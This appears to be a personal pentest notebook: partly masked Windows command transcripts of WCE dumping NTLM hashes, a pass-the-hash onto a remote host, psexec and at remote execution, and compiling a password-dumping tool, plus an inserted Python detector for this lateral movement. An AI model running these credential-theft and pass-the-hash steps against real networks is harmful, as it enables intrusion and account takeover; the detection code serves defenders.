Some time ago I tested some techniques; now published quick & dirty as a note for whom it might be interesting.
Test WCE
Source: http://www.ampliasecurity.com
E:\wce_v1_42beta_x32>wce
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
dax:DAX-RYMZ48Z3EYO:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
DAX-RYMZ48Z3EYO$:ACME:00000000000000000000000000000000:4460E0BCB8CCF37D8A9E81XXXXXXXXXX
E:\wce_v1_42beta_x32>wce -s Administrator:ACME:E52CAC67419A9A224A3B10XXXXXXXXXX:8846F7EAEE8FB118AB06BDXXXXXXXXXX
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Changing NTLM credentials of current logon session (00168AB3h) to:
Username: Administrator
domain: ACME
LMHash: E52CAC67419A9A224A3B10XXXXXXXXXX
NTHash: 8846F7EAEE8FB118AB06BDXXXXXXXXXX
NTLM credentials successfully changed!
E:\wce_v1_42beta_x32>dir \\192.168.16.2\c$
Volume in Laufwerk \\192.168.16.2\c$: hat keine Bezeichnung.
Volumeseriennummer: 5450-733C
Verzeichnis von \\192.168.16.2\c$
21.05.2016  14:44                 0 AUTOEXEC.BAT
21.05.2016  15:56    <DIR>          ClientApps
21.05.2016  14:44                 0 CONFIG.SYS
21.05.2016  15:00    <DIR>          Dokumente und Einstellungen
21.05.2016  17:33         2.229.504 Exchange Server Setup Progress.log
21.05.2016  15:24    <DIR>          fax
21.05.2016  15:51    <DIR>          Inetpub
21.05.2016  15:52    <DIR>          Programme
21.05.2016  15:51    <DIR>          Users Shared Folders
21.05.2016  17:33    <DIR>          WINDOWS
21.05.2016  14:50    <DIR>          wmpub
3 Datei(en) 2.229.504 Bytes
8 Verzeichnis(se), 16.708.521.984 Bytes frei
But for remote execution psexec is needed:
E:\wce_v1_42beta_x32>..\PSTools\psexec \\192.168.16.2 ipconfig
PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
Windows-IP-Konfiguration
Ethernet-Adapter LAN-Verbindung des Servers:
Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
ipconfig exited on 192.168.16.2 with error code 0.
E:\wce_v1_42beta_x32>copy wce.exe \\192.168.16.2\c$
1 Datei(en) kopiert.
-> worked
E:\wce_v1_42beta_x32>del wce.exe \\192.168.16.2\c$
Möchten Sie "\\192.168.16.2\c$\*" löschen (J/N)? J
E:\wce_v1_42beta_x32>md \\192.168.16.2\c$\temp
Running commands with at
E:\wce_v1_42beta_x32>at \\192.168.16.2 18:35 cmd /c "ipconfig > c:\temp\ipconf.txt"
Neuer Auftrag hinzugefügt. Kennung = 1
E:\wce_v1_42beta_x32>move \\192.168.16.2\c$\temp\ipconf.txt .
E:\wce_v1_42beta_x32>type ipconf.txt
Windows-IP-Konfiguration
Ethernet-Adapter LAN-Verbindung des Servers:
Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.16.2
Subnetzmaske . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . :
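From the defender's side, the two transcripts above leave a recognisable trail on the target: an NTLM network logon, access to the C$ admin share, and then either the PSEXESVC service that PsExec installs or a newly created scheduled task. The following is an added detection example (not code from the post, from WCE or from PsExec) that correlates those artifacts over constructed Windows event records; the event IDs are the real Security/System log IDs (4624, 5140, 7045, 4698), while the sample events, field names and the ten-minute window are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Each record names the host
# that logged it; 4624 (logon) and 5140 (share accessed) also carry the
# source address; 7045 (service installed) and 4698 (task created) do not.
SAMPLE_EVENTS = [
    {"ts": "2016-05-21 18:30:02", "id": 4624, "host": "EXCH01", "src": "192.168.16.5",
     "user": "Administrator", "logon_type": 3, "auth_pkg": "NTLM"},
    {"ts": "2016-05-21 18:30:03", "id": 5140, "host": "EXCH01", "src": "192.168.16.5",
     "user": "Administrator", "share": "\\\\*\\C$"},
    {"ts": "2016-05-21 18:30:09", "id": 7045, "host": "EXCH01", "service": "PSEXESVC"},
    {"ts": "2016-05-21 18:34:40", "id": 4698, "host": "EXCH01", "task": "\\At1"},
    # Benign: Kerberos logon from a backup host, no admin-share access afterwards.
    {"ts": "2016-05-21 18:40:00", "id": 4624, "host": "FS01", "src": "192.168.16.9",
     "user": "backup", "logon_type": 3, "auth_pkg": "Kerberos"},
]

ADMIN_SHARES = ("C$", "ADMIN$")
WINDOW = timedelta(minutes=10)  # assumed correlation window


def _ts(e):
    return datetime.strptime(e["ts"], "%Y-%m-%d %H:%M:%S")


def detect_lateral_movement(events, window=WINDOW):
    """One alert per (host, NTLM network logon) where the same source then
    touches an admin share and a remote-execution artifact appears within
    `window`: PSEXESVC service install (7045) or a new scheduled task (4698)."""
    by_host = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        logons = [e for e in evs if e["id"] == 4624
                  and e["logon_type"] == 3 and e["auth_pkg"] == "NTLM"]
        for logon in logons:
            later = [e for e in evs
                     if timedelta(0) <= _ts(e) - _ts(logon) <= window]
            share = any(e["id"] == 5140 and e["src"] == logon["src"]
                        and e["share"].upper().endswith(ADMIN_SHARES) for e in later)
            execs = sorted({e["id"] for e in later
                            if (e["id"] == 7045 and e["service"] == "PSEXESVC")
                            or e["id"] == 4698})
            if share and execs:
                alerts.append({"host": host, "src": logon["src"],
                               "user": logon["user"], "artifacts": execs})
    return alerts
```

Tuning note: legitimate admin tooling produces the same 4624/5140 pairs, so the value is in the third step (service install or task creation) and in an allow-list of known management hosts.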
Test pwdump
Source (seems to be down):
http://52.25.198.231/blog/2015/09/02/reading-windows-password/
https://github.com/khuangia/wce
Fork:
https://github.com/govolution/wce
32-bit only, as far as I remember.
C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl getpwd.cpp /link psapi.lib advapi32.lib
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
getpwd.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.
/out:getpwd.exe
psapi.lib
advapi32.lib
getpwd.obj
C:\Dokumente und Einstellungen\dax\Eigene Dateien\getpwd>cl /LD getpwd_dll.cpp
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
getpwd_dll.cpp
Microsoft (R) Incremental Linker Version 9.00.30729.01
Copyright (C) Microsoft Corporation. All rights reserved.
/out:getpwd_dll.dll
/dll
/implib:getpwd_dll.lib
getpwd_dll.obj
Creating library getpwd_dll.lib and object getpwd_dll.exp
-> then use it ;).